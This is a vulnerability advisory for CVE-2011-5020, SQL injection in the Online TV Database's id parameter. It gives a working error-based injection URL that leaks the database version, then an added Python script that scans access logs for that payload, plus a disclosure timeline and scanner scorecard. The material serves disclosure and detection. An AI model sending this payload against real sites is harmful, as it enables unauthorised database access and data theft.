CVE-2011-5020, Online TV Database, SQL Injection, CWE-89, CAPEC-66
Source URL http://sourceforge.net/projects/tvdb/
Bug: SQLi in Id Parameter
Application Description:
"A web/XML interface and database schema for managing TV series
information and user-submitted graphics. Will be interfaced by a
number of HTPC plugins and software. Currently used by plugins for
Meedio, Media Portal, and XBox Media Center".
"The API is currently being used by the myTV add-in for Windows Media Center, XBMC (formerly XBox Media Center); the meeTVshows and TVNight plugins for Meedio; the MP-TVSeries plugin for MediaPortal, Numote (iPhone/Android app and set-top device), and many more".
SQL Injection in the Id Parameter, PoC:
/?tab=series&id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
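Added example, not part of the advisory or the tvdb project: a Python scan over constructed Apache combined-format access-log lines that flags the error-based payload above by its signatures (the floor(rand()*2) / group by duplicate-key trick, the @@version probe, CHAR()/CONCAT() string building) and, independently, by the id parameter not being numeric. The log format and the assumption that id is always an integer are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines: one benign request and one carrying the
# advisory's PoC payload exactly as a server would log it (URL-encoded).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2012:10:01:12 +0000] "GET /?tab=series&id=73739 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Feb/2012:10:01:15 +0000] "GET /?tab=series&id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1" 200 6210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Signatures of the error-based technique used in the PoC: a duplicate-key error is
# forced via floor(rand()*2) ... group by, with @@version smuggled into the key.
SIGNATURES = {
    "select_from": re.compile(r"\bselect\b.+?\bfrom\b", re.I | re.S),
    "rand_floor": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "char_concat": re.compile(r"\bconcat\s*\(.*\bchar\s*\(\s*\d+", re.I | re.S),
}

# Parameters the application treats as numeric identifiers (assumed for tvdb's id):
# any non-digit value is a finding on its own, whatever the payload looks like.
NUMERIC_PARAMS = {"id"}

def inspect_target(target):
    """Return {param: [signature names]} for every query parameter that looks injected."""
    findings = {}
    # parse_qs percent-decodes and turns '+' into spaces, so the regexes see the real SQL
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
            if name in NUMERIC_PARAMS and not value.isdigit():
                hits.append("non_numeric_id")
            if hits:
                findings[name] = hits
    return findings

def scan_log(text):
    """Return (client_ip, param, hits) for every log line whose query carries >= 2 signatures."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, hits in inspect_target(m["target"]).items():
            if len(hits) >= 2:
                alerts.append((m["ip"], param, hits))
    return alerts
```

A single hit (for example a lone non-numeric id) is worth a lower-priority log entry rather than an alert, since typos in links produce it too.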
Timeline
12-24-2011 - Notified Developer
12-27-2011 - Obtained CVE ID
12-29-2011 - Renotified Developer
.... No contact
2-6-2012 - Published
Vulnerability    URL    Parameter    ParameterType
SQL Injection    /      tab, id      GET, GET
Coverage Scorecard
Burp 1.4.x - No
Acunetix 7 + 8 - No
Netsparker 2 - Yes
NeXpose - No
Paros Pro - No
ZAProxy - No
W3AF - No
SQLMap - No
Regex Match for major CoTs ongoing....